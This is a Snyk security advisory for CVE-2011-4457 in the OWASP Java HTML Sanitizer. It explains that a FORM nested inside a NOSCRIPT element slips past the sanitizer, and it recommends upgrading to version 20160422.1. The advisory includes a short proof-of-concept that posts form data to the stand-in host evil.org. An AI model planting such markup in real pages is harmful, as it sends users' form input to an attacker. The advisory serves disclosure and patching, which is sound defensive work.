Information Exposure Affecting com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer package, versions [,20160422.1)


Severity

Recommended
0.0
low
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.33% (71st percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JAVA-COMGOOGLECODEOWASPJAVAHTMLSANITIZER-6182919
  • published21 Jan 2024
  • disclosed17 May 2022
  • creditUnknown

Introduced: 17 May 2022

CVE-2011-4457  (opens in a new tab)
CWE-200  (opens in a new tab)

How to fix?

Upgrade com.googlecode.owasp-java-html-sanitizer:owasp-java-html-sanitizer to version 20160422.1 or higher.

Overview

Affected versions of this package are vulnerable to Information Exposure via a crafted FORM element within a NOSCRIPT element. An attacker can obtain potentially sensitive information by convincing a user to submit the form when JavaScript is disabled.

Note:

Due to the constrained circumstances and the fact that it does not allow the exfiltration of data protected by the same-origin policy, it is considered low risk. For policies that allow external links, the privilege escalation only includes POSTing, possibly including the upload of files chosen by the user.

PoC

<noscript>
  <form method=POST action=http://evil.org/>
    <input name=x value=y>
    <input type=submit>
  </form>
</noscript>

CVSS Base Scores

version 3.1